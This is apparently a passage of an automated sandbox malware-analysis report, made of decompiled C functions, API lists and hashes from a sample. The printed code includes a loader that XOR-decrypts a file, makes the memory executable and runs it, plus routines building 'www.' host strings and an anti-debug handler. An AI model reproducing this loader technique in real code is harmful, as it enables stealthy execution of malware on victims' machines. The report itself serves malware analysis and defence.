                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                            • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                            • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                            • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 258 41a622-41a647 call 41af20 260 41a64c-41a661 RtlFreeHeap 258->260
                            C-Code - Quality: 58%
                            			E0041A622(void* __esi, intOrPtr _a11, void* _a15, long _a19, void* _a23, intOrPtr _a37) {
                            				char _t13;
                            				void* _t19;
                            
                            				_a37 = _a37 - __esi;
                            				asm("a16 xlatb");
                            				asm("out dx, eax");
                            				_t10 = _a11;
                            				_push(__esi);
                            				_t6 = _t10 + 0xc74; // 0xc74
                            				E0041AF20(_t19, _a11, _t6,  *((intOrPtr*)(_a11 + 0x10)), 0, 0x35);
                            				_t13 = RtlFreeHeap(_a15, _a19, _a23); // executed
                            				return _t13;
                            			}






                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 5466a3c7689492fe8f9de9d1d41959b15ac87c4716cbee0e51d87b3e6aef476a
                            • Instruction ID: cd8e9116cd56eeea8269715e7e8455ca775269357dc0eb2edff77a274d3d209d
                            • Opcode Fuzzy Hash: 5466a3c7689492fe8f9de9d1d41959b15ac87c4716cbee0e51d87b3e6aef476a
                            • Instruction Fuzzy Hash: C5F0EDB1210214AFD718EF65DC48EE73769EF88354F01425EF90897241C631E811CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 261 41a630-41a646 262 41a64c-41a661 RtlFreeHeap 261->262 263 41a647 call 41af20 261->263 263->262
                            C-Code - Quality: 100%
                            			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                            				char _t10;
                            				void* _t15;
                            
                            				_t3 = _a4 + 0xc74; // 0xc74
                            				E0041AF20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 264 41a78f-41a7aa call 41af20 266 41a7af-41a7c4 LookupPrivilegeValueW 264->266
                            C-Code - Quality: 100%
                            			E0041A78F(WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                            				intOrPtr _v0;
                            				int _t10;
                            				void* _t15;
                            
                            				_t7 = _v0;
                            				E0041AF20(_t15, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                            				_t10 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                            				return _t10;
                            			}







                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 41ff4af20946d5aa30d61d7bbf5aeec8a549fa04e46ac48c3e910b6fbb44b532
                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                            • Opcode Fuzzy Hash: 41ff4af20946d5aa30d61d7bbf5aeec8a549fa04e46ac48c3e910b6fbb44b532
                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 267 41a790-41a7a9 268 41a7af-41a7c4 LookupPrivilegeValueW 267->268 269 41a7aa call 41af20 267->269 269->268
                            C-Code - Quality: 100%
                            			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                            				int _t10;
                            				void* _t15;
                            
                            				E0041AF20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}






                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041A670(intOrPtr _a4, int _a8) {
                            				void* _t10;
                            
                            				_t5 = _a4;
                            				_t3 = _t5 + 0xc7c; // 0x8bec97d1
                            				E0041AF20(_t10, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
                            				ExitProcess(_a8);
                            			}





                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E0041A66B(intOrPtr _a3, int _a7) {
                            				void* _t13;
                            
                            				asm("adc ecx, edx");
                            				_t6 = _a3;
                            				_t3 = _t6 + 0xc7c; // 0x8bec97d1
                            				E0041AF20(_t13, _a3, _t3,  *((intOrPtr*)(_a3 + 0xa14)), 0, 0x36);
                            				ExitProcess(_a7);
                            			}





                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: d3e304961623e0cafa82c136944fe7c2b17506e405657fb6babb0763df470661
                            • Instruction ID: 8ba298a813dd72448b52bdce0f0841dd63784532cc6a02a9cd9b05fe3fef58cf
                            • Opcode Fuzzy Hash: d3e304961623e0cafa82c136944fe7c2b17506e405657fb6babb0763df470661
                            • Instruction Fuzzy Hash: 4ED02BB42085402BC700CB288CC5E933BA4CF45310F04856EB8DA5B203C134E905C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E01321210(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a12) {
                            				signed int _v12;
                            				intOrPtr _v20;
                            				char* _v24;
                            				long _v28;
                            				void* _v32;
                            				long _v36;
                            				void* __ebp;
                            
                            				_v12 = 0;
                            				_v28 = 0;
                            				_v24 = "248058040134";
                            				_v20 = E01321649(_a12, 0x13300f8);
                            				_push(2);
                            				_push(0);
                            				_push(_v20);
                            				E01321BB2(__ebx, __edx, __edi, __esi, __eflags);
                            				_push(_v20);
                            				_v28 = E01321ABA(__ebx, _v20, __edi, __esi, __eflags);
                            				_push(0);
                            				_push(0);
                            				_push(_v20);
                            				E01321BB2(__ebx, _v20, __edi, __esi, __eflags);
                            				_v32 = E0132148F(__ebx, _v20, __edi, _v28);
                            				E01321900(_v32, _v28, 1, _v20);
                            				while(_v12 < _v28) {
                            					asm("cdq");
                            					 *(_v32 + _v12) =  *(_v32 + _v12) & 0x000000ff ^ _v24[_v12 % 0xc] & 0x000000ff;
                            					_v12 = _v12 + 1;
                            				}
                            				VirtualProtect(_v32, _v28, 0x40,  &_v36);
                            				return _v32();
                            			}











                            APIs
                              • Part of subcall function 01321649: __fsopen.LIBCMT ref: 01321656
                            • _fseek.LIBCMT ref: 01321247
                            • _ftell.LIBCMT ref: 01321253
                            • _fseek.LIBCMT ref: 01321266
                              • Part of subcall function 01321BB2: __lock_file.LIBCMT ref: 01321BFD
                              • Part of subcall function 01321BB2: __fseek_nolock.LIBCMT ref: 01321C0D
                            • _malloc.LIBCMT ref: 01321272
                              • Part of subcall function 0132148F: __FF_MSGBANNER.LIBCMT ref: 013214B2
                              • Part of subcall function 0132148F: __NMSG_WRITE.LIBCMT ref: 013214B9
                              • Part of subcall function 0132148F: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,0132571C,?,00000001,?,?,01321EEE,00000018,0132D4A0,0000000C,01321F7F), ref: 01321506
                            • __fread_nolock.LIBCMT ref: 0132128B
                            • VirtualProtect.KERNEL32(?,00000000,00000040,?), ref: 013212D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _fseek$AllocHeapProtectVirtual__fread_nolock__fseek_nolock__fsopen__lock_file_ftell_malloc
                            • String ID: 248058040134
                            • API String ID: 3704003650-1212554544
                            • Opcode ID: 4528d6f80380741a590b097523fe314493de831cf1fd3ed5fa2504d85b405794
                            • Instruction ID: f1bfeb3cd10206685e5728230f941454a6bac0d9a4406f8d9f18214ab653cb0d
                            • Opcode Fuzzy Hash: 4528d6f80380741a590b097523fe314493de831cf1fd3ed5fa2504d85b405794
                            • Instruction Fuzzy Hash: 82217FB1E0021A9FDB04EFD4C881FBFBB75BF94304F144558E611A7240D675AA51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E01325B55(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                            				intOrPtr _v0;
                            				void* _v804;
                            				intOrPtr _v808;
                            				intOrPtr _v812;
                            				intOrPtr _t6;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            				intOrPtr _t13;
                            				long _t17;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				intOrPtr _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				intOrPtr* _t31;
                            				void* _t34;
                            
                            				_t27 = __esi;
                            				_t26 = __edi;
                            				_t25 = __edx;
                            				_t22 = __ecx;
                            				_t21 = __ebx;
                            				_t6 = __eax;
                            				_t34 = _t22 -  *0x132f5d8; // 0xbb40e64e
                            				if(_t34 == 0) {
                            					asm("repe ret");
                            				}
                            				 *0x1330878 = _t6;
                            				 *0x1330874 = _t22;
                            				 *0x1330870 = _t25;
                            				 *0x133086c = _t21;
                            				 *0x1330868 = _t27;
                            				 *0x1330864 = _t26;
                            				 *0x1330890 = ss;
                            				 *0x1330884 = cs;
                            				 *0x1330860 = ds;
                            				 *0x133085c = es;
                            				 *0x1330858 = fs;
                            				 *0x1330854 = gs;
                            				asm("pushfd");
                            				_pop( *0x1330888);
                            				 *0x133087c =  *_t31;
                            				 *0x1330880 = _v0;
                            				 *0x133088c =  &_a4;
                            				 *0x13307c8 = 0x10001;
                            				_t11 =  *0x1330880; // 0x0
                            				 *0x133077c = _t11;
                            				 *0x1330770 = 0xc0000409;
                            				 *0x1330774 = 1;
                            				_t12 =  *0x132f5d8; // 0xbb40e64e
                            				_v812 = _t12;
                            				_t13 =  *0x132f5dc; // 0x44bf19b1
                            				_v808 = _t13;
                            				 *0x13307c0 = IsDebuggerPresent();
                            				_push(1);
                            				E01327168(_t14);
                            				SetUnhandledExceptionFilter(0);
                            				_t17 = UnhandledExceptionFilter(0x132ca38);
                            				if( *0x13307c0 == 0) {
                            					_push(1);
                            					E01327168(_t17);
                            				}
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}




















                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0132952B
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01329540
                            • UnhandledExceptionFilter.KERNEL32(0132CA38), ref: 0132954B
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 01329567
                            • TerminateProcess.KERNEL32(00000000), ref: 0132956E
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction ID: fd63e98e6d297a92027ca4b481c7d7d551dc6c967760522bfe12cd789a5f2b6e
                            • Opcode Fuzzy Hash: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction Fuzzy Hash: AF21BFB4801218DFD779EF69E4466583BECFB08B45F60501AF5098B348E7B4A981CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E00417D32(void* __eax, void* __ebx, void* __edi, signed int __esi) {
                            				signed int _t135;
                            				char _t136;
                            				void* _t146;
                            				signed int _t151;
                            				intOrPtr _t166;
                            				intOrPtr _t210;
                            				char _t215;
                            				void* _t270;
                            				char _t276;
                            				intOrPtr _t277;
                            				void* _t282;
                            				void* _t283;
                            				signed int _t289;
                            				void* _t292;
                            
                            				asm("lds ecx, [esi]");
                            				asm("out dx, al");
                            				asm("aam 0x39");
                            				asm("popfd");
                            				asm("rcl dword [eax], 0x9d");
                            				asm("aad 0x4c");
                            				_t289 = 0x2fdbfe78 ^  *(__edi - 0x3cb7436c);
                            				_t282 = __eax -  *((intOrPtr*)(__edi - 0x60));
                            				asm("in eax, dx");
                            				asm("bound esp, [edi+0x5c]");
                            				asm("invalid");
                            				asm("o16 sahf");
                            				_t135 = (__esi | 0xd09491ed) ^ 0xa05b7bb4;
                            				if(_t135 >= 0) {
                            					asm("rol byte [ebx+0x45c60cc4], 0xf0");
                            					 *0xFFFFFFFF8966F203 =  *((intOrPtr*)(0xffffffff8966f203)) + 0xbe;
                            					_t283 = _t282 + 1;
                            					asm("cmc");
                            					 *(_t283 - 9) = _t135;
                            					_t276 = 0;
                            					__eflags = 0;
                            					do {
                            						_t136 = E0040A470(__eflags, 0x4e, 0x8d);
                            						_t289 = _t289 + 8;
                            						_t215 = 0;
                            						__eflags = 0;
                            						while(1) {
                            							__eflags = _t136 -  *((intOrPtr*)(_t283 + _t215 - 0x10));
                            							if(_t136 ==  *((intOrPtr*)(_t283 + _t215 - 0x10))) {
                            								goto L8;
                            							}
                            							_t215 = _t215 + 1;
                            							__eflags = _t215 - _t276;
                            							if(_t215 <= _t276) {
                            								continue;
                            							} else {
                            								__eflags = _t136;
                            								if(_t136 != 0) {
                            									 *((char*)(_t283 + _t276 - 0x10)) = _t136;
                            									_t276 = _t276 + 1;
                            									__eflags = _t276;
                            								}
                            							}
                            							goto L8;
                            						}
                            						L8:
                            						__eflags = _t276 - 8;
                            					} while (__eflags < 0);
                            					 *((intOrPtr*)(_t283 - 8)) = 0x2e777777;
                            					 *((char*)(_t283 - 4)) = 0;
                            					 *((short*)(_t283 - 3)) = 0;
                            					 *((char*)(_t283 - 1)) = 0;
                            					 *((char*)(_t283 - 0x98)) = 0;
                            					E0041BE20(_t283 - 0x97, 0, 0x3f);
                            					_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
                            					_push(_t283 - 0x98);
                            					E0041C6D0();
                            					 *((char*)(_t283 + E0041C070(_t283 - 0x98) - 0x98)) = 0x3d;
                            					_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
                            					_push(_t283 + E0041C070(_t283 - 0x98) - 0x98);
                            					_t146 = E0041C6D0();
                            					_t31 = _t283 + 8; // 0x2e777777
                            					_t277 =  *_t31;
                            					_t210 = 0;
                            					_t292 = _t289 + 0x34;
                            					 *((intOrPtr*)(_t283 - 0x14)) = 0;
                            					_t270 = 0;
                            					do {
                            						__eflags =  *((intOrPtr*)(_t277 + 0x1160)) - _t210;
                            						if( *((intOrPtr*)(_t277 + 0x1160)) != _t210) {
                            							E0041BDD0(_t283 - 0x58, 0x2e);
                            							 *((short*)(_t283 - 0x308)) = 0;
                            							E0041BE20(_t283 - 0x306, 0, 0x206);
                            							E0041BDD0( *((intOrPtr*)(_t277 + 0x149c)) + _t270, 0x388);
                            							_t151 = E0041C390();
                            							_t39 = _t210 - 1; // -1
                            							 *( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x40) = _t151 * _t39 & 0x00000001;
                            							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x87, _t283 - 0x98, E0041C070(_t283 - 0x98));
                            							_t47 = _t283 - 8; // 0x2e777777
                            							E0041BDA0(_t283 - 0x58, _t47, 4);
                            							_push(4);
                            							E0040AFA0(_t210, _t277, __eflags, _t277, _t283 + E0041C070(_t283 - 0x58) - 0x58,  *(_t283 + _t210 - 0x10) & 0x000000ff);
                            							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270, _t283 - 0x58, E0041C070(_t283 - 0x58));
                            							_t166 = E0041C070(_t283 - 0x58);
                            							_t212 = _t277 + 0xe90;
                            							 *((intOrPtr*)(_t283 - 0x18)) = _t166;
                            							E0041C1A0(_t283 - 0x58, _t277 + 0xe90, 0);
                            							E00409E10(_t283 - 0x100);
                            							E0040AB60(_t283 - 0x100, _t283 - 0x58, E0041C070(_t283 - 0x58));
                            							E0040AB30(_t283 - 0x100);
                            							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x72, _t283 - 0x100, 0x14);
                            							 *((char*)(_t283 +  *((intOrPtr*)(_t283 - 0x18)) - 0x58)) = 0;
                            							 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x4c)) = 2;
                            							 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x50)) = 1;
                            							E0040B030(_t277 + 0xe90, _t277, __eflags, _t277, _t283 - 0x308, 0x41, 1);
                            							E0041C440( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x308);
                            							E0040B030(_t277 + 0xe90, _t277, __eflags, _t277, _t283 - 0x308, 0x42, 1);
                            							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x308);
                            							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x58, 0);
                            							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x45, 1);
                            							E0041C440( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x308);
                            							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x46, 1);
                            							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x308);
                            							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x58, 0);
                            							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x4a, 1);
                            							__eflags = E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287) +  *((intOrPtr*)(_t277 + 0x149c));
                            							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t283 - 0x308);
                            							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t283 - 0x58, 0);
                            							_t146 = E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t212, 0);
                            							_t210 =  *((intOrPtr*)(_t283 - 0x14));
                            							_t292 = _t292 + 0x144;
                            						}
                            						_t210 = _t210 + 1;
                            						_t270 = _t270 + 0x388;
                            						 *((intOrPtr*)(_t283 - 0x14)) = _t210;
                            						__eflags = _t270 - 0x1c40;
                            					} while (_t270 < 0x1c40);
                            					return _t146;
                            				} else {
                            					0x788c11f0();
                            					_pop(ss);
                            					asm("scasd");
                            					_push(__edi);
                            					return _t135;
                            				}
                            			}


















                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =$www.$www.
                            • API String ID: 0-3343787489
                            • Opcode ID: 8796de7e74906856ddb9612c52c7dee8710cbe4ccc7daeaa7db8a7b2532509b4
                            • Instruction ID: 651dae6f98f4df4358a4767328f329d86b8fd16b36b16a3c410919bef54c0669
                            • Opcode Fuzzy Hash: 8796de7e74906856ddb9612c52c7dee8710cbe4ccc7daeaa7db8a7b2532509b4
                            • Instruction Fuzzy Hash: 2EC1D576554348ABC714DBF0CCC2FEBB37CAF44708F00465EB6595B182DA78A688CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e88be34466a8cc4249a800bb975a624229cd6a5aa22bb58552ad5f047246573a
                            • Instruction ID: 81de8bbdf3469b43227be3faf92764b7fdc0544f2859d087baa47713c334f41d
                            • Opcode Fuzzy Hash: e88be34466a8cc4249a800bb975a624229cd6a5aa22bb58552ad5f047246573a
                            • Instruction Fuzzy Hash: 4601422094968A8ADB039F699082792FBB5EF46BA0F4811ADCC90E7582D752C422C384
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4263cbf3fc683bb1f62888b8560153c516afcffab3ccaf9dd81ea3a975a7dab4
                            • Instruction ID: 9a23272e15cd87e7d99fb6569f32b7fa32f1a186cbbe2e5b092c5b72b158dd18
                            • Opcode Fuzzy Hash: 4263cbf3fc683bb1f62888b8560153c516afcffab3ccaf9dd81ea3a975a7dab4
                            • Instruction Fuzzy Hash: ACD012337994280FEB114C487C416FCF779D7D3136F186267F808EB181C156C41652C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01321000(void* __ebx, void* __ecx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20) {
                            				intOrPtr _v8;
                            
                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0) {
                            					return 0x57;
                            				} else {
                            					_v8 = E0132141A(_a4, 0x5c);
                            					if(_v8 == 0) {
                            						_v8 = E01321559(_a4, 0x40);
                            						if(_v8 == 0) {
                            							if(lstrlenW(_a4) <= _a12 - 1) {
                            								lstrcpyW(_a8, _a4);
                            								 *_a16 = 0;
                            								return 0;
                            							}
                            							return 0x7a;
                            						}
                            						if(_v8 + 2 - _a4 >> 1 <= _a12 - 1) {
                            							if(lstrlenW(_v8 + 2) <= _a20 - 1) {
                            								lstrcpyW(_a16, _v8 + 2);
                            								E01327760(__ebx, __edi, __esi, _a8, _a4, _v8 - _a4 >> 1 << 1);
                            								_a8[_v8 - _a4 >> 1] = 0;
                            								return 0;
                            							}
                            							return 0x7a;
                            						}
                            						return 0x7a;
                            					}
                            					if(_v8 - _a4 >> 1 <= _a20 - 1) {
                            						if(lstrlenW(_v8 + 2) <= _a12 - 1) {
                            							lstrcpyW(_a8, _v8 + 2);
                            							E01327760(__ebx, __edi, __esi, _a16, _a4, _v8 - _a4 >> 1 << 1);
                            							_a16[_v8 - _a4 >> 1] = 0;
                            							return 0;
                            						}
                            						return 0x7a;
                            					}
                            					return 0x7a;
                            				}
                            			}





                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$_wcschr_wcsrchr
                            • String ID:
                            • API String ID: 2287690931-0
